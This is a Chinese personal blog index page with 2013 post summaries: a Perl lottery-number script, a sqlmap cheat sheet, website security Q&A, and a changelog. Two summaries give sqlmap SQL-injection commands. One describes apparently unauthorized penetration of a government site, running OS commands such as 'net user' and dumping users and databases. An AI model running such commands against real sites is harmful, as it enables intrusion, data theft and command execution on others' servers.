上一页 1 ··· 14 15 16 17 18 19 20 21 22 ··· 48 下一页
摘要: 周末在家没事干,突然想写算3d号码的计算器。但是没写完,因为有事情要忙。。先记录下,下午出去回来继续改。#!/usr/bin/perluse DBI;# 生成随机数字0-999$num=int(rand(999));# 查找已经出过奖的数字# 这个是已出过的中奖号码$old=read_db("select * from old_papar");# 这个是自己买的,且没中过的号码#$user=read_db("select * from new_papar");# 创建两个个哈希表%old_number=();%user_number=();print $ 阅读全文
posted @ 2013-07-20 13:59 墨迹哥's 阅读(195) 评论(0) 推荐(0) 编辑
摘要: 这东西真的很好用,今天好好的看了下。并且实践出真知,这东西的强大不是靠吹的。******************基本步骤***************sqlmap -u "http://news.hackworry.com/news?id=1" --current-user #获取当前用户名称sqlmap -u "http://news.hackworry.com/news?id=1" --current-db #获取当前数据库名称sqlmap -u "http://news.hackworry.com/news?id=1" --ta 阅读全文
posted @ 2013-07-19 16:31 墨迹哥's 阅读(223) 评论(0) 推荐(0) 编辑
摘要: 这次渗透没有什么亮点,主要就是SQLMAP。这玩意很给力。直接给干掉了。。。 2005 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dbs --threads 10 2006 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --users --threads 10 2007 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-cmd="net user" 阅读全文
posted @ 2013-07-19 16:25 墨迹哥's 阅读(274) 评论(0) 推荐(0) 编辑
摘要: 今天逛的时候发现的,就此转下:1、一个网站基本的安全措施有哪些?答:1)服务器管理权,包括服务器是否容易被被盗,服务器是否能让人随意插拔网线,服务器网关是否可以由别人随意控制 2)shell权限管理,如何登录服务器管理,必须本地登录,或者可以远程登录,或者通过vpn或者防火墙控制登录。 3)数据库管理,只允许本地登录,也允许远程登录,是否有ip限制。 4)网站软件运行的用户是否是root,能否随意读取服务器上的文件 5)代码中是否有sql注入,xss攻击的可能 6)OS是否有漏洞或者后门 7)DNS是否安全 8)是否有arp攻击2、一个网站的用户数据库被入侵的方式有哪些? 1)代码中有s... 阅读全文
posted @ 2013-07-18 12:43 墨迹哥's 阅读(168) 评论(0) 推荐(0) 编辑
摘要: 1.将用户密码以MD5加密.2.修改密码处也改成MD5的.3.后台建立,开始写后台模块。4.完成后台个人信息查看、管理修改密码模块。5.完成后台用户列表查看模块。6.调整了后台主页面CSS和框架. 阅读全文
posted @ 2013-07-18 12:02 墨迹哥's 阅读(158) 评论(0) 推荐(0) 编辑
上一页 1 ··· 14 15 16 17 18 19 20 21 22 ··· 48 下一页